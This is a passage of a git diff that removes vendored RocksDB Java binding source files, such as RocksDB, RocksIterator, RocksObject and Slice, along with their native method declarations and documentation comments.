-    compactRange(nativeHandle_, begin, begin.length, end, end.length,
-        reduce_level, target_level, target_path_id,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * This function will wait until all currently running background processes
-   * finish. After it returns, no background process will be run until
-   * {@link #continueBackgroundWork()} is called
-   *
-   * @throws RocksDBException If an error occurs when pausing background work
-   */
-  public void pauseBackgroundWork() throws RocksDBException {
-    pauseBackgroundWork(nativeHandle_);
-  }
-
-  /**
-   * Resumes backround work which was suspended by
-   * previously calling {@link #pauseBackgroundWork()}
-   *
-   * @throws RocksDBException If an error occurs when resuming background work
-   */
-  public void continueBackgroundWork() throws RocksDBException {
-    continueBackgroundWork(nativeHandle_);
-  }
-
-  /**
-   * <p>The sequence number of the most recent transaction.</p>
-   *
-   * @return sequence number of the most
-   *     recent transaction.
-   */
-  public long getLatestSequenceNumber() {
-    return getLatestSequenceNumber(nativeHandle_);
-  }
-
-  /**
-   * <p>Prevent file deletions. Compactions will continue to occur,
-   * but no obsolete files will be deleted. Calling this multiple
-   * times have the same effect as calling it once.</p>
-   *
-   * @throws RocksDBException thrown if operation was not performed
-   *     successfully.
-   */
-  public void disableFileDeletions() throws RocksDBException {
-    disableFileDeletions(nativeHandle_);
-  }
-
-  /**
-   * <p>Allow compactions to delete obsolete files.
-   * If force == true, the call to EnableFileDeletions()
-   * will guarantee that file deletions are enabled after
-   * the call, even if DisableFileDeletions() was called
-   * multiple times before.</p>
-   *
-   * <p>If force == false, EnableFileDeletions will only
-   * enable file deletion after it's been called at least
-   * as many times as DisableFileDeletions(), enabling
-   * the two methods to be called by two threads
-   * concurrently without synchronization
-   * -- i.e., file deletions will be enabled only after both
-   * threads call EnableFileDeletions()</p>
-   *
-   * @param force boolean value described above.
-   *
-   * @throws RocksDBException thrown if operation was not performed
-   *     successfully.
-   */
-  public void enableFileDeletions(final boolean force)
-      throws RocksDBException {
-    enableFileDeletions(nativeHandle_, force);
-  }
-
-  /**
-   * <p>Returns an iterator that is positioned at a write-batch containing
-   * seq_number. If the sequence number is non existent, it returns an iterator
-   * at the first available seq_no after the requested seq_no.</p>
-   *
-   * <p>Must set WAL_ttl_seconds or WAL_size_limit_MB to large values to
-   * use this api, else the WAL files will get
-   * cleared aggressively and the iterator might keep getting invalid before
-   * an update is read.</p>
-   *
-   * @param sequenceNumber sequence number offset
-   *
-   * @return {@link org.rocksdb.TransactionLogIterator} instance.
-   *
-   * @throws org.rocksdb.RocksDBException if iterator cannot be retrieved
-   *     from native-side.
-   */
-  public TransactionLogIterator getUpdatesSince(final long sequenceNumber)
-      throws RocksDBException {
-    return new TransactionLogIterator(
-        getUpdatesSince(nativeHandle_, sequenceNumber));
-  }
-
-  public void setOptions(final ColumnFamilyHandle columnFamilyHandle,
-                         final MutableColumnFamilyOptions mutableColumnFamilyOptions)
-          throws RocksDBException {
-    setOptions(nativeHandle_, columnFamilyHandle.nativeHandle_,
-            mutableColumnFamilyOptions.getKeys(),
-            mutableColumnFamilyOptions.getValues());
-  }
-
-  private long[] toNativeHandleList(final List<? extends RocksObject> objectList) {
-    final int len = objectList.size();
-    final long[] handleList = new long[len];
-    for (int i = 0; i < len; i++) {
-      handleList[i] = objectList.get(i).nativeHandle_;
-    }
-    return handleList;
-  }
-
-  /**
-   * ingestExternalFile will load a list of external SST files (1) into the DB
-   * We will try to find the lowest possible level that the file can fit in, and
-   * ingest the file into this level (2). A file that have a key range that
-   * overlap with the memtable key range will require us to Flush the memtable
-   * first before ingesting the file.
-   *
-   * (1) External SST files can be created using {@link SstFileWriter}
-   * (2) We will try to ingest the files to the lowest possible level
-   * even if the file compression doesn't match the level compression
-   *
-   * @param filePathList The list of files to ingest
-   * @param ingestExternalFileOptions the options for the ingestion
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  public void ingestExternalFile(final List<String> filePathList,
-      final IngestExternalFileOptions ingestExternalFileOptions)
-      throws RocksDBException {
-    ingestExternalFile(nativeHandle_, getDefaultColumnFamily().nativeHandle_,
-        filePathList.toArray(new String[filePathList.size()]),
-        filePathList.size(), ingestExternalFileOptions.nativeHandle_);
-  }
-
-  /**
-   * ingestExternalFile will load a list of external SST files (1) into the DB
-   * We will try to find the lowest possible level that the file can fit in, and
-   * ingest the file into this level (2). A file that have a key range that
-   * overlap with the memtable key range will require us to Flush the memtable
-   * first before ingesting the file.
-   *
-   * (1) External SST files can be created using {@link SstFileWriter}
-   * (2) We will try to ingest the files to the lowest possible level
-   * even if the file compression doesn't match the level compression
-   *
-   * @param columnFamilyHandle The column family for the ingested files
-   * @param filePathList The list of files to ingest
-   * @param ingestExternalFileOptions the options for the ingestion
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  public void ingestExternalFile(final ColumnFamilyHandle columnFamilyHandle,
-      final List<String> filePathList,
-      final IngestExternalFileOptions ingestExternalFileOptions)
-      throws RocksDBException {
-    ingestExternalFile(nativeHandle_, columnFamilyHandle.nativeHandle_,
-        filePathList.toArray(new String[filePathList.size()]),
-        filePathList.size(), ingestExternalFileOptions.nativeHandle_);
-  }
-
-  /**
-   * Private constructor.
-   *
-   * @param nativeHandle The native handle of the C++ RocksDB object
-   */
-  protected RocksDB(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  // native methods
-  protected native static long open(final long optionsHandle,
-      final String path) throws RocksDBException;
-
-  /**
-   * @param optionsHandle Native handle pointing to an Options object
-   * @param path The directory path for the database files
-   * @param columnFamilyNames An array of column family names
-   * @param columnFamilyOptions An array of native handles pointing to
-   *                            ColumnFamilyOptions objects
-   *
-   * @return An array of native handles, [0] is the handle of the RocksDB object
-   *   [1..1+n] are handles of the ColumnFamilyReferences
-   *
-   * @throws RocksDBException thrown if the database could not be opened
-   */
-  protected native static long[] open(final long optionsHandle,
-      final String path, final byte[][] columnFamilyNames,
-      final long[] columnFamilyOptions) throws RocksDBException;
-
-  protected native static long openROnly(final long optionsHandle,
-      final String path) throws RocksDBException;
-
-  /**
-   * @param optionsHandle Native handle pointing to an Options object
-   * @param path The directory path for the database files
-   * @param columnFamilyNames An array of column family names
-   * @param columnFamilyOptions An array of native handles pointing to
-   *                            ColumnFamilyOptions objects
-   *
-   * @return An array of native handles, [0] is the handle of the RocksDB object
-   *   [1..1+n] are handles of the ColumnFamilyReferences
-   *
-   * @throws RocksDBException thrown if the database could not be opened
-   */
-  protected native static long[] openROnly(final long optionsHandle,
-      final String path, final byte[][] columnFamilyNames,
-      final long[] columnFamilyOptions
-  ) throws RocksDBException;
-
-  protected native static byte[][] listColumnFamilies(long optionsHandle,
-      String path) throws RocksDBException;
-  protected native void put(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength)
-      throws RocksDBException;
-  protected native void put(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength,
-      long cfHandle) throws RocksDBException;
-  protected native void put(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength) throws RocksDBException;
-  protected native void put(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength, long cfHandle) throws RocksDBException;
-  protected native void write0(final long handle, long writeOptHandle,
-      long wbHandle) throws RocksDBException;
-  protected native void write1(final long handle, long writeOptHandle,
-      long wbwiHandle) throws RocksDBException;
-  protected native boolean keyMayExist(final long handle, final byte[] key,
-      final int keyOffset, final int keyLength,
-      final StringBuilder stringBuilder);
-  protected native boolean keyMayExist(final long handle, final byte[] key,
-      final int keyOffset, final int keyLength, final long cfHandle,
-      final StringBuilder stringBuilder);
-  protected native boolean keyMayExist(final long handle,
-      final long optionsHandle, final byte[] key, final int keyOffset,
-      final int keyLength, final StringBuilder stringBuilder);
-  protected native boolean keyMayExist(final long handle,
-      final long optionsHandle, final byte[] key, final int keyOffset,
-      final int keyLength, final long cfHandle,
-      final StringBuilder stringBuilder);
-  protected native void merge(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength)
-      throws RocksDBException;
-  protected native void merge(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength,
-      long cfHandle) throws RocksDBException;
-  protected native void merge(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength) throws RocksDBException;
-  protected native void merge(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength, long cfHandle) throws RocksDBException;
-  protected native int get(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength)
-      throws RocksDBException;
-  protected native int get(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength,
-      long cfHandle) throws RocksDBException;
-  protected native int get(long handle, long readOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength) throws RocksDBException;
-  protected native int get(long handle, long readOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength, long cfHandle) throws RocksDBException;
-  protected native byte[][] multiGet(final long dbHandle, final byte[][] keys,
-      final int[] keyOffsets, final int[] keyLengths);
-  protected native byte[][] multiGet(final long dbHandle, final byte[][] keys,
-      final int[] keyOffsets, final int[] keyLengths,
-      final long[] columnFamilyHandles);
-  protected native byte[][] multiGet(final long dbHandle, final long rOptHandle,
-      final byte[][] keys, final int[] keyOffsets, final int[] keyLengths);
-  protected native byte[][] multiGet(final long dbHandle, final long rOptHandle,
-      final byte[][] keys, final int[] keyOffsets, final int[] keyLengths,
-      final long[] columnFamilyHandles);
-  protected native byte[] get(long handle, byte[] key, int keyOffset,
-      int keyLength) throws RocksDBException;
-  protected native byte[] get(long handle, byte[] key, int keyOffset,
-      int keyLength, long cfHandle) throws RocksDBException;
-  protected native byte[] get(long handle, long readOptHandle,
-      byte[] key, int keyOffset, int keyLength) throws RocksDBException;
-  protected native byte[] get(long handle, long readOptHandle, byte[] key,
-      int keyOffset, int keyLength, long cfHandle) throws RocksDBException;
-  protected native void delete(long handle, byte[] key, int keyOffset,
-      int keyLength) throws RocksDBException;
-  protected native void delete(long handle, byte[] key, int keyOffset,
-      int keyLength, long cfHandle) throws RocksDBException;
-  protected native void delete(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength) throws RocksDBException;
-  protected native void delete(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, long cfHandle) throws RocksDBException;
-  protected native void singleDelete(
-      long handle, byte[] key, int keyLen) throws RocksDBException;
-  protected native void singleDelete(
-      long handle, byte[] key, int keyLen, long cfHandle)
-      throws RocksDBException;
-  protected native void singleDelete(
-      long handle, long writeOptHandle,
-      byte[] key, int keyLen) throws RocksDBException;
-  protected native void singleDelete(
-      long handle, long writeOptHandle,
-      byte[] key, int keyLen, long cfHandle) throws RocksDBException;
-  protected native void deleteRange(long handle, byte[] beginKey, int beginKeyOffset,
-      int beginKeyLength, byte[] endKey, int endKeyOffset, int endKeyLength)
-      throws RocksDBException;
-  protected native void deleteRange(long handle, byte[] beginKey, int beginKeyOffset,
-      int beginKeyLength, byte[] endKey, int endKeyOffset, int endKeyLength, long cfHandle)
-      throws RocksDBException;
-  protected native void deleteRange(long handle, long writeOptHandle, byte[] beginKey,
-      int beginKeyOffset, int beginKeyLength, byte[] endKey, int endKeyOffset, int endKeyLength)
-      throws RocksDBException;
-  protected native void deleteRange(long handle, long writeOptHandle, byte[] beginKey,
-      int beginKeyOffset, int beginKeyLength, byte[] endKey, int endKeyOffset, int endKeyLength,
-      long cfHandle) throws RocksDBException;
-  protected native String getProperty0(long nativeHandle,
-      String property, int propertyLength) throws RocksDBException;
-  protected native String getProperty0(long nativeHandle, long cfHandle,
-      String property, int propertyLength) throws RocksDBException;
-  protected native long getLongProperty(long nativeHandle, String property,
-      int propertyLength) throws RocksDBException;
-  protected native long getLongProperty(long nativeHandle, long cfHandle,
-      String property, int propertyLength) throws RocksDBException;
-  protected native long iterator(long handle);
-  protected native long iterator(long handle, long readOptHandle);
-  protected native long iteratorCF(long handle, long cfHandle);
-  protected native long iteratorCF(long handle, long cfHandle,
-      long readOptHandle);
-  protected native long[] iterators(final long handle,
-      final long[] columnFamilyHandles, final long readOptHandle)
-      throws RocksDBException;
-  protected native long getSnapshot(long nativeHandle);
-  protected native void releaseSnapshot(long nativeHandle, long snapshotHandle);
-  @Override protected final native void disposeInternal(final long handle);
-  private native long getDefaultColumnFamily(long handle);
-  private native long createColumnFamily(final long handle,
-      final byte[] columnFamilyName, final long columnFamilyOptions)
-      throws RocksDBException;
-  private native void dropColumnFamily(long handle, long cfHandle)
-      throws RocksDBException;
-  private native void flush(long handle, long flushOptHandle)
-      throws RocksDBException;
-  private native void flush(long handle, long flushOptHandle, long cfHandle)
-      throws RocksDBException;
-  private native void compactRange0(long handle, boolean reduce_level,
-      int target_level, int target_path_id) throws RocksDBException;
-  private native void compactRange0(long handle, byte[] begin, int beginLen,
-      byte[] end, int endLen, boolean reduce_level, int target_level,
-      int target_path_id) throws RocksDBException;
-  private native void compactRange(long handle, boolean reduce_level,
-      int target_level, int target_path_id, long cfHandle)
-      throws RocksDBException;
-  private native void compactRange(long handle, byte[] begin, int beginLen,
-      byte[] end, int endLen, boolean reduce_level, int target_level,
-      int target_path_id, long cfHandle) throws RocksDBException;
-  private native void pauseBackgroundWork(long handle) throws RocksDBException;
-  private native void continueBackgroundWork(long handle) throws RocksDBException;
-  private native long getLatestSequenceNumber(long handle);
-  private native void disableFileDeletions(long handle) throws RocksDBException;
-  private native void enableFileDeletions(long handle, boolean force)
-      throws RocksDBException;
-  private native long getUpdatesSince(long handle, long sequenceNumber)
-      throws RocksDBException;
-  private native void setOptions(long handle, long cfHandle, String[] keys,
-      String[] values) throws RocksDBException;
-  private native void ingestExternalFile(long handle, long cfHandle,
-      String[] filePathList, int filePathListLen,
-      long ingest_external_file_options_handle) throws RocksDBException;
-  protected DBOptionsInterface options_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDBException.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDBException.java
deleted file mode 100644
index 8b035f4..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDBException.java
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * A RocksDBException encapsulates the error of an operation.  This exception
- * type is used to describe an internal error from the c++ rocksdb library.
- */
-public class RocksDBException extends Exception {
-
-  /* @Nullable */ private final Status status;
-
-  /**
-   * The private construct used by a set of public static factory method.
-   *
-   * @param msg the specified error message.
-   */
-  public RocksDBException(final String msg) {
-    this(msg, null);
-  }
-
-  public RocksDBException(final String msg, final Status status) {
-    super(msg);
-    this.status = status;
-  }
-
-  public RocksDBException(final Status status) {
-    super(status.getState() != null ? status.getState()
-        : status.getCodeString());
-    this.status = status;
-  }
-
-  /**
-   * Get the status returned from RocksDB
-   *
-   * @return The status reported by RocksDB, or null if no status is available
-   */
-  public Status getStatus() {
-    return status;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksEnv.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksEnv.java
deleted file mode 100644
index 8fe61fd..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksEnv.java
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>A RocksEnv is an interface used by the rocksdb implementation to access
- * operating system functionality like the filesystem etc.</p>
- *
- * <p>All Env implementations are safe for concurrent access from
- * multiple threads without any external synchronization.</p>
- */
-public class RocksEnv extends Env {
-
-  /**
-   * <p>Package-private constructor that uses the specified native handle
-   * to construct a RocksEnv.</p>
-   *
-   * <p>Note that the ownership of the input handle
-   * belongs to the caller, and the newly created RocksEnv will not take
-   * the ownership of the input handle.  As a result, calling
-   * {@code dispose()} of the created RocksEnv will be no-op.</p>
-   */
-  RocksEnv(final long handle) {
-    super(handle);
-    disOwnNativeHandle();
-  }
-
-  /**
-   * <p>The helper function of {@link #dispose()} which all subclasses of
-   * {@link RocksObject} must implement to release their associated C++
-   * resource.</p>
-   *
-   * <p><strong>Note:</strong> this class is used to use the default
-   * RocksEnv with RocksJava. The default env allocation is managed
-   * by C++.</p>
-   */
-  @Override
-  protected final void disposeInternal(final long handle) {
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIterator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIterator.java
deleted file mode 100644
index 9e9c648..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIterator.java
+++ /dev/null
@@ -1,64 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>An iterator that yields a sequence of key/value pairs from a source.
- * Multiple implementations are provided by this library.
- * In particular, iterators are provided
- * to access the contents of a Table or a DB.</p>
- *
- * <p>Multiple threads can invoke const methods on an RocksIterator without
- * external synchronization, but if any of the threads may call a
- * non-const method, all threads accessing the same RocksIterator must use
- * external synchronization.</p>
- *
- * @see org.rocksdb.RocksObject
- */
-public class RocksIterator extends AbstractRocksIterator<RocksDB> {
-  protected RocksIterator(RocksDB rocksDB, long nativeHandle) {
-    super(rocksDB, nativeHandle);
-  }
-
-  /**
-   * <p>Return the key for the current entry.  The underlying storage for
-   * the returned slice is valid only until the next modification of
-   * the iterator.</p>
-   *
-   * <p>REQUIRES: {@link #isValid()}</p>
-   *
-   * @return key for the current entry.
-   */
-  public byte[] key() {
-    assert(isOwningHandle());
-    return key0(nativeHandle_);
-  }
-
-  /**
-   * <p>Return the value for the current entry.  The underlying storage for
-   * the returned slice is valid only until the next modification of
-   * the iterator.</p>
-   *
-   * <p>REQUIRES: !AtEnd() &amp;&amp; !AtStart()</p>
-   * @return value for the current entry.
-   */
-  public byte[] value() {
-    assert(isOwningHandle());
-    return value0(nativeHandle_);
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  @Override final native boolean isValid0(long handle);
-  @Override final native void seekToFirst0(long handle);
-  @Override final native void seekToLast0(long handle);
-  @Override final native void next0(long handle);
-  @Override final native void prev0(long handle);
-  @Override final native void seek0(long handle, byte[] target, int targetLen);
-  @Override final native void status0(long handle) throws RocksDBException;
-
-  private native byte[] key0(long handle);
-  private native byte[] value0(long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIteratorInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIteratorInterface.java
deleted file mode 100644
index 12fdbb1..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIteratorInterface.java
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>Defines the interface for an Iterator which provides
- * access to data one entry at a time. Multiple implementations
- * are provided by this library.  In particular, iterators are provided
- * to access the contents of a DB and Write Batch.</p>
- *
- * <p>Multiple threads can invoke const methods on an RocksIterator without
- * external synchronization, but if any of the threads may call a
- * non-const method, all threads accessing the same RocksIterator must use
- * external synchronization.</p>
- *
- * @see org.rocksdb.RocksObject
- */
-public interface RocksIteratorInterface {
-
-  /**
-   * <p>An iterator is either positioned at an entry, or
-   * not valid.  This method returns true if the iterator is valid.</p>
-   *
-   * @return true if iterator is valid.
-   */
-  boolean isValid();
-
-  /**
-   * <p>Position at the first entry in the source.  The iterator is Valid()
-   * after this call if the source is not empty.</p>
-   */
-  void seekToFirst();
-
-  /**
-   * <p>Position at the last entry in the source.  The iterator is
-   * valid after this call if the source is not empty.</p>
-   */
-  void seekToLast();
-
-  /**
-   * <p>Position at the first entry in the source whose key is that or
-   * past target.</p>
-   *
-   * <p>The iterator is valid after this call if the source contains
-   * a key that comes at or past target.</p>
-   *
-   * @param target byte array describing a key or a
-   *               key prefix to seek for.
-   */
-  void seek(byte[] target);
-
-  /**
-   * <p>Moves to the next entry in the source.  After this call, Valid() is
-   * true if the iterator was not positioned at the last entry in the source.</p>
-   *
-   * <p>REQUIRES: {@link #isValid()}</p>
-   */
-  void next();
-
-  /**
-   * <p>Moves to the previous entry in the source.  After this call, Valid() is
-   * true if the iterator was not positioned at the first entry in source.</p>
-   *
-   * <p>REQUIRES: {@link #isValid()}</p>
-   */
-  void prev();
-
-  /**
-   * <p>If an error has occurred, return it.  Else return an ok status.
-   * If non-blocking IO is requested and this operation cannot be
-   * satisfied without doing some IO, then this returns Status::Incomplete().</p>
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *                          native library.
-   */
-  void status() throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMemEnv.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMemEnv.java
deleted file mode 100644
index d18d0ce..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMemEnv.java
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RocksDB memory environment.
- */
-public class RocksMemEnv extends Env {
-
-  /**
-   * <p>Creates a new RocksDB environment that stores its data
-   * in memory and delegates all non-file-storage tasks to
-   * base_env. The caller must delete the result when it is
-   * no longer needed.</p>
-   *
-   * <p>{@code *base_env} must remain live while the result is in use.</p>
-   */
-  public RocksMemEnv() {
-    super(createMemEnv());
-  }
-
-  private static native long createMemEnv();
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMutableObject.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMutableObject.java
deleted file mode 100644
index e92289d..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMutableObject.java
+++ /dev/null
@@ -1,87 +0,0 @@
-// Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RocksMutableObject is an implementation of {@link AbstractNativeReference}
- * whose reference to the underlying native C++ object can change.
- *
- * <p>The use of {@code RocksMutableObject} should be kept to a minimum, as it
- * has synchronization overheads and introduces complexity. Instead it is
- * recommended to use {@link RocksObject} where possible.</p>
- */
-public abstract class RocksMutableObject extends AbstractNativeReference {
-
-  /**
-   * An mutable reference to the value of the C++ pointer pointing to some
-   * underlying native RocksDB C++ object.
-   */
-  private long nativeHandle_;
-  private boolean owningHandle_;
-
-  protected RocksMutableObject() {
-  }
-
-  protected RocksMutableObject(final long nativeHandle) {
-    this.nativeHandle_ = nativeHandle;
-    this.owningHandle_ = true;
-  }
-
-  /**
-   * Closes the existing handle, and changes the handle to the new handle
-   *
-   * @param newNativeHandle The C++ pointer to the new native object
-   * @param owningNativeHandle true if we own the new native object
-   */
-  public synchronized void resetNativeHandle(final long newNativeHandle,
-      final boolean owningNativeHandle) {
-    close();
-    setNativeHandle(newNativeHandle, owningNativeHandle);
-  }
-
-  /**
-   * Sets the handle (C++ pointer) of the underlying C++ native object
-   *
-   * @param nativeHandle The C++ pointer to the native object
-   * @param owningNativeHandle true if we own the native object
-   */
-  public synchronized void setNativeHandle(final long nativeHandle,
-      final boolean owningNativeHandle) {
-    this.nativeHandle_ = nativeHandle;
-    this.owningHandle_ = owningNativeHandle;
-  }
-
-  @Override
-  protected synchronized boolean isOwningHandle() {
-    return this.owningHandle_;
-  }
-
-  /**
-   * Gets the value of the C++ pointer pointing to the underlying
-   * native C++ object
-   *
-   * @return the pointer value for the native object
-   */
-  protected synchronized long getNativeHandle() {
-    assert (this.nativeHandle_ != 0);
-    return this.nativeHandle_;
-  }
-
-  @Override
-  public synchronized final void close() {
-    if (isOwningHandle()) {
-      disposeInternal();
-      this.owningHandle_ = false;
-      this.nativeHandle_ = 0;
-    }
-  }
-
-  protected void disposeInternal() {
-    disposeInternal(nativeHandle_);
-  }
-
-  protected abstract void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksObject.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksObject.java
deleted file mode 100644
index 545dd89..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksObject.java
+++ /dev/null
@@ -1,41 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RocksObject is an implementation of {@link AbstractNativeReference} which
- * has an immutable and therefore thread-safe reference to the underlying
- * native C++ RocksDB object.
- * <p>
- * RocksObject is the base-class of almost all RocksDB classes that have a
- * pointer to some underlying native C++ {@code rocksdb} object.</p>
- * <p>
- * The use of {@code RocksObject} should always be preferred over
- * {@link RocksMutableObject}.</p>
- */
-public abstract class RocksObject extends AbstractImmutableNativeReference {
-
-  /**
-   * An immutable reference to the value of the C++ pointer pointing to some
-   * underlying native RocksDB C++ object.
-   */
-  protected final long nativeHandle_;
-
-  protected RocksObject(final long nativeHandle) {
-    super(true);
-    this.nativeHandle_ = nativeHandle;
-  }
-
-  /**
-   * Deletes underlying C++ object pointer.
-   */
-  @Override
-  protected void disposeInternal() {
-    disposeInternal(nativeHandle_);
-  }
-
-  protected abstract void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SkipListMemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SkipListMemTableConfig.java
deleted file mode 100644
index e31e199..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SkipListMemTableConfig.java
+++ /dev/null
@@ -1,50 +0,0 @@
-package org.rocksdb;
-
-/**
- * The config for skip-list memtable representation.
- */
-public class SkipListMemTableConfig extends MemTableConfig {
-
-  public static final long DEFAULT_LOOKAHEAD = 0;
-
-  /**
-   * SkipListMemTableConfig constructor
-   */
-  public SkipListMemTableConfig() {
-    lookahead_ = DEFAULT_LOOKAHEAD;
-  }
-
-  /**
-   * Sets lookahead for SkipList
-   *
-   * @param lookahead If non-zero, each iterator's seek operation
-   *     will start the search from the previously visited record
-   *     (doing at most 'lookahead' steps). This is an
-   *     optimization for the access pattern including many
-   *     seeks with consecutive keys.
-   * @return the current instance of SkipListMemTableConfig
-   */
-  public SkipListMemTableConfig setLookahead(final long lookahead) {
-    lookahead_ = lookahead;
-    return this;
-  }
-
-  /**
-   * Returns the currently set lookahead value.
-   *
-   * @return lookahead value
-   */
-  public long lookahead() {
-    return lookahead_;
-  }
-
-
-  @Override protected long newMemTableFactoryHandle() {
-    return newMemTableFactoryHandle0(lookahead_);
-  }
-
-  private native long newMemTableFactoryHandle0(long lookahead)
-      throws IllegalArgumentException;
-
-  private long lookahead_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Slice.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Slice.java
deleted file mode 100644
index a122c37..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Slice.java
+++ /dev/null
@@ -1,112 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>Base class for slices which will receive
- * byte[] based access to the underlying data.</p>
- *
- * <p>byte[] backed slices typically perform better with
- * small keys and values. When using larger keys and
- * values consider using {@link org.rocksdb.DirectSlice}</p>
- */
-public class Slice extends AbstractSlice<byte[]> {
-
-  /**
-   * Indicates whether we have to free the memory pointed to by the Slice
-   */
-  private volatile boolean cleared;
-  private volatile long internalBufferOffset = 0;
-
-  /**
-   * <p>Called from JNI to construct a new Java Slice
-   * without an underlying C++ object set
-   * at creation time.</p>
-   *
-   * <p>Note: You should be aware that
-   * {@see org.rocksdb.RocksObject#disOwnNativeHandle()} is intentionally
-   * called from the default Slice constructor, and that it is marked as
-   * private. This is so that developers cannot construct their own default
-   * Slice objects (at present). As developers cannot construct their own
-   * Slice objects through this, they are not creating underlying C++ Slice
-   * objects, and so there is nothing to free (dispose) from Java.</p>
-   */
-  @SuppressWarnings("unused")
-  private Slice() {
-    super();
-  }
-
-  /**
-   * <p>Constructs a slice where the data is taken from
-   * a String.</p>
-   *
-   * @param str String value.
-   */
-  public Slice(final String str) {
-    super(createNewSliceFromString(str));
-  }
-
-  /**
-   * <p>Constructs a slice where the data is a copy of
